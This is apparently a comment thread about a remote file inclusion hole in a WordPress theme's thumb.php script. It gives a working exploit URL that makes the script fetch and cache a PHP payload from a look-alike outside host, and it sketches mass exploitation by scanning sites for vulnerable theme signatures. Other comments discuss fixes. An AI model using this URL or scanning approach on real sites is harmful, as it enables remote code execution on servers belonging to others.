But to use this vulnerability at first cracker have to have registered user?
Or there are other way to upload images?
Accessing
http://www.example.com/wordpress/wp-content/ themes/vulnerable-theme/thumb.php?src=flickr.com.example.org/payload.php
is sufficient to cause it to download payload.php and cache it. Afterwards, you can access the PHP file in the same manner to execute it.One could trivially make a list of signatures for vulnerable themes (for example, all the ones I paid for from a certain prominent Wordpress themes company), and then exploit any website whose main page matched a signature. Alternatively, you could just speculatively hit a few hundred URLs on every domain you found.
$fileDetails = pathinfo($src);
$ext = strtolower($fileDetails['extension']);Even if you don't have such vulnerabilities you probably don't want people to be able to upload images to your server. They could easily send you over quota on shared hosting and use your bandwidth for serving their own images (including child porn).
This still allows the attacker to host images on your site though.
Well put.
Probably best to remove allowed hosts altogether.